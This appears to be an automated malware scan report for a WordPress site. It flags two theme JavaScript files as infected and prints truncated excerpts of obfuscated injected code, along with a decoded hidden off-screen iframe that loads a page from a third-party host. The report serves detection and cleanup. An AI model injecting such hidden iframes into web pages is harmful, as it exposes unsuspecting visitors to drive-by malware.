Scanned pages/files
Request | Server response | Status |
http://rgun.ru/ | 200 OK Content-Length: 51078 Content-Type: text/html | clean |
http://rgun.ru/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/x-javascript | clean |
http://rgun.ru/wp-content/themes/NewsCommunity/lib/shortcodes/js/bootstrap.js?ver=3.4.2 | 200 OK Content-Length: 12785 Content-Type: application/x-javascript | clean |
http://rgun.ru/wp-content/themes/NewsCommunity/lib/js/superfish.js?ver=3.4.2 | 200 OK Content-Length: 5555 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner prints only the beginning and the end of the file; the cut is marked [...] below, so the excerpt is incomplete. The visible injected code (stripos / see_user_agent) sits at the start of the file, ahead of the tail of the original superfish.js plugin code:
(function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre [...] o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery);
Decoded script (the scanner's de-obfuscated output: an iframe positioned off-screen at left/top -1155px, so the visitor does not see it, that loads a page from a third-party host):
<iframe src="http://Internet.sololineas.com/dfgatrsjygfhsrtjs12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>
Antivirus reports:
| ||
http://rgun.ru/wp-content/themes/NewsCommunity/lib/js/jquery.mobilemenu.js?ver=3.4.2 | 200 OK Content-Length: 3781 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner prints only the beginning and the end of the file; the cut is marked [...] below, so the excerpt is incomplete. The visible injected code (stripos / see_user_agent) sits at the start of the file, ahead of the tail of the original jquery.mobilemenu.js plugin code:
(function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre [...] optText = dash + optText; } $('<option />', { "value" : this.href, "html" : optText, "selected" : (this.href == window.location.href) }).appendTo( '.' + settings.className ); }); $('.' + settings.className).change(function(){ var locations = $(this).val(); if( locations !== '#' ) { window.location.href = $(this).val(); }; }); }); return this; }; })(jQuery);
Decoded script (the scanner's de-obfuscated output: an iframe positioned off-screen at left/top -1155px, so the visitor does not see it, that loads a page from a third-party host; the iframe URL is the same one reported for superfish.js):
<iframe src="http://Internet.sololineas.com/dfgatrsjygfhsrtjs12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe>
Antivirus reports:
| ||
http://rgun.ru/wp-content/themes/NewsCommunity/includes/featuredposts/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 31032 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19916 Content-Type: text/javascript | clean |
http://rgun.ru/wp-includes/js/hoverIntent.js?ver=r6 | 200 OK Content-Length: 996 Content-Type: application/x-javascript | clean |
http://rgun.ru/feed/ | 200 OK Content-Length: 13871 Content-Type: text/xml | clean |
http://rgun.ru/test404page.js | 404 Not Found Content-Length: 22330 Content-Type: text/html | clean |
http://rgun.ru/top/avtomobili/ | 200 OK Content-Length: 28730 Content-Type: text/html | clean |
http://rgun.ru/top/kompyutery-i-elektronika/ | 200 OK Content-Length: 34633 Content-Type: text/html | clean |
http://rgun.ru/top/muzhskie-razgovory/ | 200 OK Content-Length: 44325 Content-Type: text/html | clean |
http://rgun.ru/top/muzhskoj-stil-i-moda/ | 200 OK Content-Length: 26599 Content-Type: text/html | clean |
http://rgun.ru/top/novosti/ | 200 OK Content-Length: 42543 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rgun.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 05:49:15 GMT
Server: nginx/1.4.3
Content-Type: text/html; charset=UTF-8
X-Pingback: http://rgun.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: rgun.ru
Referer: http://www.google.com/search?q=rgun.ru
Result:
The result is similar to the first query. No suspicious redirects were found. This test looks only at the server's HTTP response to the two requests shown; it does not cover the script injections reported under "Scanned pages/files", which are delivered inside the theme's JavaScript files.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rgun.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rgun.ru/
Result: rgun.ru is not infected or malware details are not published yet.